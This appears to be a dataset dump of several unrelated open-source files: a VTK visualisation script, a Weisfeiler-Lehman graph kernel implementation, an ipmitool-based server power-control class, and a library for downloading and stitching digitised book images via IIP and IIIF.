for i in range(0, numLines):
file.readline()
# LOAN_AMOUNT - skip
while file.readline()[:11] != "LOAN_AMOUNT":
pass
for i in range(0, numLines):
file.readline()
# INTEREST_RATE - independent variable
while file.readline()[:13] != "INTEREST_RATE":
pass
interestRate = vtk.vtkFloatArray()
interestRate.SetName("INTEREST_RATE")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
interestRate.InsertNextValue(val[j])
fieldData.AddArray(interestRate)
# MONTHLY_INCOME - independent variable
while file.readline()[:14] != "MONTHLY_INCOME":
pass
monthlyIncome = vtk.vtkFloatArray()
monthlyIncome.SetName("MONTHLY_INCOME")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyIncome.InsertNextValue(val[j])
fieldData.AddArray(monthlyIncome)
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign them.
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is need to force the pipeline
# to execute so that we can find the range of the array TIME_LATE
rf.Update()
# Set max to the second (GetRange returns [min,max]) of the "range of the
# array called scalar in the PointData of the output of rf"
max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by max (applies division to all components of the array)
calc.SetFunction("s / %f"%max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# construct pipeline for original population
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
global xAxis, yAxis, zAxis, popSplatter
# Create axes.
popSplatter.Update()
bounds = popSplatter.GetOutput().GetBounds()
axes = vtk.vtkAxes()
axes.SetOrigin(bounds[0], bounds[2], bounds[4])
axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
axesTubes = vtk.vtkTubeFilter()
axesTubes.SetInputConnection(axes.GetOutputPort())
axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
axesTubes.SetNumberOfSides(6)
axesMapper = vtk.vtkPolyDataMapper()
axesMapper.SetInputConnection(axesTubes.GetOutputPort())
axesActor = vtk.vtkActor()
axesActor.SetMapper(axesMapper)
# Label the axes.
XText = vtk.vtkVectorText()
XText.SetText(xAxis)
XTextMapper = vtk.vtkPolyDataMapper()
XTextMapper.SetInputConnection(XText.GetOutputPort())
XActor = vtk.vtkFollower()
XActor.SetMapper(XTextMapper)
XActor.SetScale(0.02, .02, .02)
XActor.SetPosition(0.35, -0.05, -0.05)
XActor.GetProperty().SetColor(0, 0, 0)
YText = vtk.vtkVectorText()
YText.SetText(yAxis)
YTextMapper = vtk.vtkPolyDataMapper()
YTextMapper.SetInputConnection(YText.GetOutputPort())
YActor = vtk.vtkFollower()
YActor.SetMapper(YTextMapper)
YActor.SetScale(0.02, .02, .02)
YActor.SetPosition(-0.05, 0.35, -0.05)
YActor.GetProperty().SetColor(0, 0, 0)
ZText = vtk.vtkVectorText()
ZText.SetText(zAxis)
ZTextMapper = vtk.vtkPolyDataMapper()
ZTextMapper.SetInputConnection(ZText.GetOutputPort())
ZActor = vtk.vtkFollower()
ZActor.SetMapper(ZTextMapper)
ZActor.SetScale(0.02, .02, .02)
ZActor.SetPosition(-0.05, -0.05, 0.35)
ZActor.GetProperty().SetColor(0, 0, 0)
return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
iren.Initialize()
renWin.Render()
iren.Start()
|
bsd-3-clause
| -383,774,845,512,799,740
| 29.492908
| 73
| 0.695079
| false
| 3.275913
| false
| false
| false
|
nickgentoo/scikit-learn-graph
|
skgraph/kernel/WLOrthoGraphKernel.py
|
1
|
15954
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 12:04:44 2015
Copyright 2015 Nicolo' Navarin
This file is part of scikit-learn-graph.
scikit-learn-graph is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
scikit-learn-graph is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with scikit-learn-graph. If not, see <http://www.gnu.org/licenses/>.
The code is from the following source.
Weisfeiler_Lehman graph kernel.
Python implementation of Nino Shervashidze Matlab code at:
http://mlcb.is.tuebingen.mpg.de/Mitarbeiter/Nino/Graphkernels/
Author : Sandro Vega Pons
License:
"""
import numpy as np
import networkx as nx
import copy
import math
from KernelTools import convert_to_sparse_matrix
from graphKernel import GraphKernel
from scipy.sparse import dok_matrix
from sklearn import preprocessing as pp
class WLOrthoGraphKernel(GraphKernel):
"""
Weisfeiler_Lehman graph kernel.
"""
def __init__(self, r = 1, normalization = False):
self.h=r
self.normalization=normalization
self.__startsymbol='!' #special symbols used in encoding
self.__conjsymbol='#'
self.__endsymbol='?'
self.__fsfeatsymbol='*'
self.__version=0
self.__contextsymbol='@'
def kernelFunction(self, g_1, g_2):
"""Compute the kernel value (similarity) between two graphs.
Parameters
----------
g1 : networkx.Graph
First graph.
g2 : networkx.Graph
Second graph.
h : interger
Number of iterations.
nl : boolean
Whether to use original node labels. True for using node labels
saved in the attribute 'node_label'. False for using the node
degree of each node as node attribute.
Returns
-------
k : The similarity value between g1 and g2.
"""
gl = [g_1, g_2]
return self.computeGrams(gl)[0, 1]
def transform(self, graph_list):
"""
TODO
"""
n = len(graph_list) #number of graphs
# list of the orthogonalized phi: phis[i] is the phi of the i-th iteration of the WL test.
phis=[]
for i in range(self.h+1):
phis.append({})
NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
label_lookup = {} #map from features to corresponding id
label_counter = 0 #incremental value for label ids
for i in range(n): #for each graph
NodeIdToLabelId[i] = {}
for j in graph_list[i].nodes(): #for each node
if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
label_lookup[graph_list[i].node[j]['label']] = label_counter
NodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
if not phis[0].has_key((i,feature)):
phis[0][(i,feature)]=0.0
phis[0][(i,feature)]+=1.0
# here we have phi[0]
### MAIN LOOP
it = 0
NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
while it <= self.h: #each iteration compute the next labellings (that are contexts of the previous)
label_lookup = {}
for i in range(n): #for each graph
for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
neighbors=[]
for u in graph_list[i].neighbors(j):
neighbors.append(NodeIdToLabelId[i][u])
neighbors.sort() #sorting neighbours
long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
for u in neighbors:
long_label_string+=str(u)+self.__conjsymbol
long_label_string=long_label_string[:-1]+self.__endsymbol
if not label_lookup.has_key(long_label_string):
label_lookup[long_label_string] = label_counter
NewNodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
if not phis[it].has_key((i,feature)):
phis[it][(i,feature)]=0.0
phis[it][(i,feature)]+=1.0
# here we have phi[it]
NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
it = it + 1
ves = [convert_to_sparse_matrix(phi) for phi in phis]
if self.normalization:
ves = [pp.normalize(ve, norm='l2', axis=1) for ve in ves]
return ves
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [dict() for x in range(n)] # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = long(1) #incremental value for label ids
#
# for i in range(n): #for each graph
# #NodeIdToLabelId[i] = {}
# #nx.draw(graph_list[i])
#
#
# for j in graph_list[i].nodes(): #for each node
# if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
# label_lookup[graph_list[i].node[j]['label']] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
#
# feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
#
# while it < self.h: #each iteration compute the next labellings (that are contexts of the previous)
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort() #sorting neighbours
#
# long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
# it = it + 1
# #print phi
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
# #phi=dok_matrix()
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 0 #incremental value for label ids
#
# for i in xrange(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# enc=graph_list[i].node[j]['label'] #"0"+
# if enc not in label_lookup:#update label_lookup and label ids
# label_lookup[enc] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[enc]
# #print enc, label_lookup[enc]
# if (i,label_lookup[enc]) not in phi:
# phi[i,label_lookup[enc]]=0
# phi[i,label_lookup[enc]]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #label_lookup = {}
#
# while it < self.h:
# label_lookup = {}
#
# for i in xrange(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u,
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# #print
# long_label_string=str(NodeIdToLabelId[i][j])#str(it+1)+self.__startsymbol+
# for u in neighbors:
# long_label_string+=self.__conjsymbol+str(u)
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# if long_label_string not in label_lookup:
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
# print long_label_string, NewNodeIdToLabelId[i][j]
#
# if (i,NewNodeIdToLabelId[i][j]) not in phi:
# phi[i,NewNodeIdToLabelId[i][j]]=0
# phi[i,NewNodeIdToLabelId[i][j]]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# #return dok_matrix(phi.todense()).tocsr()
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 1 #incremental value for label ids
#
# for i in range(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# #print graph_list[i].node[j]['label']
# if not label_lookup.has_key("0|"+str(graph_list[i].node[j]['label'])):#update label_lookup and label ids
# label_lookup["0|"+str(graph_list[i].node[j]['label'])] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup["0|"+str(graph_list[i].node[j]['label'])]
#
# if not phi.has_key((i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])):
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]=0
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #NewNodeIdToLabelId =[0] * n
# while it < self.h:
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# if len(neighbors)==0:
# print "Empty neighbors"
# #MODIFICATO RISPETTO a TESSELLI str(it)+self.__startsymbol+
# long_label_string=str(it+1)+"|"+str(NodeIdToLabelId[i][j])+self.__startsymbol
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if len(neighbors)==0:
# print long_label_string
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# if not phi.has_key((i,NewNodeIdToLabelId[i][j])):
# phi[(i,NewNodeIdToLabelId[i][j])]=0
# phi[(i,NewNodeIdToLabelId[i][j])]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# return convert_to_sparse_matrix(phi)
# def __normalization(self, gram):
# """
# TODO
# """
# if self.normalization:
# diagonal=np.diag(gram)
# a=np.tile(diagonal,(gram.shape[0],1))
# b=diagonal.reshape((gram.shape[0],1))
# b=np.tile(b,(1,gram.shape[1]))
#
# return gram/np.sqrt(a*b)
# else :
# return gram
def computeKernelMatrixTrain(self,Graphs):
return self.computeGrams(Graphs)
def computeGrams(self,g_it,ps=None):
if ps is None:
ps=self.transform(g_it)
return [precomputed.dot(precomputed.T).todense().tolist() for precomputed in ps]
|
gpl-3.0
| 6,825,893,100,655,079,000
| 41.772118
| 160
| 0.521938
| false
| 3.715417
| false
| false
| false
|
stroucki/tashi
|
src/zoni/hardware/ipmi.py
|
2
|
3580
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import subprocess
import logging
from systemmanagementinterface import SystemManagementInterface
#class systemmagement():
#def __init__(self, proto):
#self.proto = proto
class Ipmi(SystemManagementInterface):
def __init__(self, config, nodeName, hostInfo):
# should send data obj instead of hostInfo
self.config = config
self.nodeName = nodeName + "-ipmi"
self.password = hostInfo['ipmi_password']
self.user = hostInfo['ipmi_user']
self.powerStatus = None
self.verbose = False
self.log = logging.getLogger(__name__)
self.ipmicmd = "ipmitool -I lanplus -U %s -H %s -P %s " % (self.user, self.nodeName, self.password)
print self.ipmicmd
def setVerbose(self, verbose):
self.verbose = verbose
def __executeCmd(self, cmd):
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out= a.stdout.readline()
err = a.stderr.readline()
if self.verbose:
print "out is ", out
print "err is ", err
if err:
self.log.info("%s %s" % (self.nodeName, err))
return -1
self.log.info("%s %s" % (self.nodeName, out))
return 1
def __setPowerStatus(self):
if self.verbose:
print self.ipmicmd
cmd = self.ipmicmd + "chassis power status"
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = a.stdout.readline()
myerr = a.stderr.readline()
if "off" in output:
self.powerStatus = 0
if "on" in output:
self.powerStatus = 1
if "Unable" in myerr:
self.powerStatus = -1
return output
def isPowered(self):
if self.powerStatus == None:
self.__setPowerStatus()
self.log.info("Hardware get power status : %s", self.powerStatus)
return self.powerStatus
def getPowerStatus(self):
#self.log.info("getPowerStatus :%s" % self.nodeName)
return self.isPowered()
def powerOn(self):
self.log.info("Hardware power on : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power on"
return self.__executeCmd(cmd)
def powerOff(self):
self.log.info("Hardware power off : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power off"
return self.__executeCmd(cmd)
def powerOffSoft(self):
self.log.info("Hardware power off (soft): %s", self.nodeName)
cmd = self.ipmicmd + "chassis power soft"
return self.__executeCmd(cmd)
def powerCycle(self):
self.log.info("Hardware power cycle : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power cycle"
return self.__executeCmd(cmd)
def powerReset(self):
self.log.info("Hardware power reset : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power reset"
return self.__executeCmd(cmd)
def activateConsole(self):
self.log.info("Hardware sol activate : %s", self.nodeName)
cmd = self.ipmicmd + "sol activate"
return self.__executeCmd(cmd)
|
apache-2.0
| 2,151,156,001,504,405,200
| 29.084034
| 101
| 0.705866
| false
| 3.228133
| false
| false
| false
|
georgthegreat/dancebooks-bibtex
|
scripts/lib.py
|
1
|
31786
|
#!/usr/bin/env python3
import functools
import http.client
import json
import math
import os
import subprocess
import shutil
import time
import uuid
from xml.etree import ElementTree
import bs4
import opster
import requests
#NOTE: if the website is protected by cloudflare, removing User-Agent header will help to pass it by
USER_AGENT = "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0"
HEADERS = {
"User-Agent": USER_AGENT
}
TIMEOUT = 30
###################
#UTILITY FUNCTIONS
###################
def retry(retry_count, delay=0, delay_backoff=1):
def actual_decorator(func):
@functools.wraps(func)
def do_retry(*args, **kwargs):
retry_number = 0
current_delay = delay
try:
return func(*args, **kwargs)
except Exception:
if retry_number >= retry_count:
raise RuntimeError(f"Failed to get results after {retry_number} retries")
else:
time.sleep(current_delay)
current_delay *= delay_backoff
retry_number += 1
return do_retry
return actual_decorator
#using single session for all requests
session = requests.Session()
#@retry(retry_count=3)
def make_request(*args, **kwargs):
"""
Performs the request and returns requests.Response object.
Accepts both raw urls and prepared requests
"""
if isinstance(args[0], str):
url = args[0]
response = requests.get(*args, headers=HEADERS, timeout=TIMEOUT, **kwargs)
elif isinstance(args[0], requests.Request):
request = args[0].prepare()
url = request.url
args = args[1:]
request.headers = HEADERS
response = session.send(request, *args, timeout=TIMEOUT, **kwargs)
if response.status_code == 200:
return response
else:
raise ValueError(f"While getting {url}: HTTP status 200 was expected. Got {response.status_code}")
#@retry(retry_count=3)
def get_json(*args, **kwargs):
"""
Returns parsed JSON object received via HTTP GET request
"""
return json.loads(make_request(*args, **kwargs).content)
def get_xml(*args, **kwargs):
"""
Returns parsed xml (as ElementTree) received via HTTP GET request
"""
return ElementTree.fromstring(make_request(*args, **kwargs).content)
def get_text(*args, **kwargs):
return make_request(*args, **kwargs).content.decode("utf-8")
def get_binary(output_filename, url_or_request, *args, **kwargs):
"""
Writes binary data received via HTTP GET request to output_filename
Accepts both url as string and request.Requests
"""
BLOCK_SIZE = 4096
response = make_request(url_or_request, *args, stream=True, **kwargs)
with open(output_filename, "wb") as file:
for chunk in response.iter_content(BLOCK_SIZE):
file.write(chunk)
def make_output_folder(downloader, book_id):
folder_name = "{downloader}_{book_id}".format(
downloader=downloader,
book_id=book_id\
.replace('/', '_')
.replace(':', '_')
)
os.makedirs(folder_name, exist_ok=True)
return folder_name
def make_output_filename(base, page=None, extension="bmp"):
result = base
if isinstance(page, int):
result = os.path.join(result, f"{page:08}")
elif page is not None:
result = os.path.join(result, page)
if extension is not None:
result += "." + extension
return result
def make_temporary_folder():
return str(uuid.uuid4())
class TileSewingPolicy(object):
def __init__(self, tiles_number_x, tiles_number_y, tile_size, image_width=None, image_height=None, overlap=None):
self.tiles_number_x = tiles_number_x
self.tiles_number_y = tiles_number_y
self.tile_size = tile_size
self.image_width = image_width
self.image_height = image_height
self.overlap = overlap
@staticmethod
def from_image_size(width, height, tile_size):
tiles_number_x = math.ceil(width / tile_size)
tiles_number_y = math.ceil(height / tile_size)
return TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size, image_width=width, image_height=height)
def sew_tiles_with_montage(folder, output_file, policy):
"""
Invokes montage tool from ImageMagick package to sew tiles together
"""
def format_magick_geometry(policy):
geometry = ""
if policy.tile_size is not None:
geometry += f"{policy.tile_size}x{policy.tile_size}"
if policy.overlap is not None:
geometry += f"-{policy.overlap}-{policy.overlap}"
if geometry:
#WARN:
# Do not allow enlarging tiles.
# Certain libraries (i. e. Gallica) use variable tile size
geometry += '>'
return geometry
def format_magick_tile(policy):
return f"{policy.tiles_number_x}x{policy.tiles_number_y}"
# Sewing tiles
cmd_line = [
"montage",
f"{folder}/*",
"-mode", "Concatenate"
]
geometry = format_magick_geometry(policy)
if geometry:
cmd_line += ["-geometry", geometry]
cmd_line += [
"-tile", format_magick_tile(policy),
output_file
]
print(f"Sewing tiles with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
if policy.image_width and policy.image_height:
# Cropping extra boundaries (right and bottom) added during sewing
cmd_line = [
"convert",
output_file,
"-extent", f"{policy.image_width}x{policy.image_height}",
output_file
]
print(f"Cropping output image with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
def download_and_sew_tiles(output_filename, url_maker, policy):
if os.path.exists(output_filename):
print(f"Skip downloading existing file {output_filename}")
tmp_folder = make_temporary_folder()
os.mkdir(tmp_folder)
try:
print(f"Downloading {policy.tiles_number_x}x{policy.tiles_number_y} tiled image to {output_filename}")
for tile_x in range(policy.tiles_number_x):
for tile_y in range(policy.tiles_number_y):
tile_file = os.path.join(tmp_folder, f"{tile_y:08d}_{tile_x:08d}.jpg")
get_binary(
tile_file,
url_maker(tile_x, tile_y)
)
sew_tiles_with_montage(tmp_folder, output_filename, policy)
finally:
if "KEEP_TEMP" not in os.environ:
shutil.rmtree(tmp_folder)
class IIPMetadata(object):
def __init__(self, tile_size, width, height, max_level):
self.tile_size = tile_size
self.width = width
self.height = height
self.max_level = max_level
@staticmethod
def from_json(json):
tile_size = 256
width = int(json["d"][-1]["w"])
height = int(json["d"][-1]["h"])
max_level = json["m"]
return IIPMetadata(tile_size, width, height, max_level)
@staticmethod
def from_text(text):
"""
Parses the following text:
```
Max-size:3590 3507
Tile-size:256 256
Resolution-number:5
```
"""
tile_size = None
width = None
height = None
max_level = None
for line in text.split('\n'):
parts = line.split(':')
if parts[0] == "Max-size":
(width, height) = map(int, parts[1].split())
elif parts[0] == "Tile-size":
tile_size = int(parts[1].split()[0])
elif parts[0] == "Resolution-number":
max_level = int(parts[1]) - 1
else:
pass
return IIPMetadata(tile_size, width, height, max_level)
def download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename):
policy = TileSewingPolicy.from_image_size(metadata.width, metadata.height, metadata.tile_size)
download_and_sew_tiles(
output_filename,
lambda tile_x, tile_y: requests.Request(
"GET",
fastcgi_url,
#WARN: passing parameters as string in order to send them in urldecoded form
#(iip does not support urlencoded parameters)
params=f"FIF={remote_filename}&JTL={metadata.max_level},{tile_y * policy.tiles_number_x + tile_x}",
),
policy
)
def download_book_from_iip(metadata_url, fastcgi_url, output_folder, files_root):
"""
Downloads book served by IIPImage fastcgi servant.
API is documented here:
http://iipimage.sourceforge.net/documentation/protocol/
"""
metadata = get_json(metadata_url)["pgs"]
print(f"Going to download {len(metadata)} pages")
for page_number, page_metadata in enumerate(metadata):
iip_page_metadata = IIPMetadata.from_json(page_metadata)
remote_filename = os.path.join(files_root, page_metadata["f"])
output_filename = make_output_filename(output_folder, page_number)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page_number:04d}")
continue
else:
print(f"Downloading page #{page_number:04d}")
download_image_from_iip(fastcgi_url, remote_filename, iip_page_metadata, output_filename)
def download_image_from_iiif(base_url, output_filename):
"""
Downloads single image via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
DESIRED_QUALITIES = ["color", "native", "default"]
DESIRED_FORMATS = ["png", "tif", "jpg"]
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
left = tile_size * tile_x
top = tile_size * tile_y
tile_width = min(width - left, tile_size)
tile_height = min(height - top, tile_size)
tile_url = f"{base_url}/{left},{top},{tile_width},{tile_height}/{tile_width},{tile_height}/0/{desired_quality}.{desired_format}"
return tile_url
metadata_url = f"{base_url}/info.json"
metadata = get_json(metadata_url)
if "tiles" in metadata:
# Served by e. g. vatlib servant
tile_size = metadata["tiles"][0]["width"]
else:
# Served by e. g. Gallica servant
tile_size = 1024
width = metadata["width"]
height = metadata["height"]
desired_quality = "default"
desired_format = "jpg"
profile = metadata.get("profile")
if (profile is not None) and (len(profile) >= 2) and (profile is not str):
# Profile is not served by Gallica servant, but served by e. g. British Library servant
# Complex condition helps to ignore missing metadata fields, see e. g.:
# https://gallica.bnf.fr/iiif/ark:/12148/btv1b10508435s/f1/info.json
# http://www.digitale-bibliothek-mv.de/viewer/rest/image/PPN880809493/00000001.tif/info.json
if "qualities" in profile[1]:
available_qualities = profile[1]["qualities"]
for quality in DESIRED_QUALITIES:
if quality in available_qualities:
desired_quality = quality
break
else:
raise RuntimeError(f"Can not choose desired image quality. Available qualities: {available_qualities!r}")
if "formats" in profile[1]:
available_formats = profile[1]["formats"]
for format in DESIRED_FORMATS:
if format in available_formats:
desired_format = format
break
else:
raise RuntimeError(f"Can not choose desired image format. Available formats: {available_formats!r}")
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
download_and_sew_tiles(output_filename, UrlMaker(), policy)
def download_book_from_iiif(manifest_url, output_folder):
"""
Downloads entire book via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
manifest = get_json(manifest_url)
canvases = manifest["sequences"][0]["canvases"]
for page, metadata in enumerate(canvases):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page:04d}")
continue
base_url = metadata["images"][-1]["resource"]["service"]["@id"]
download_image_from_iiif(base_url, output_filename)
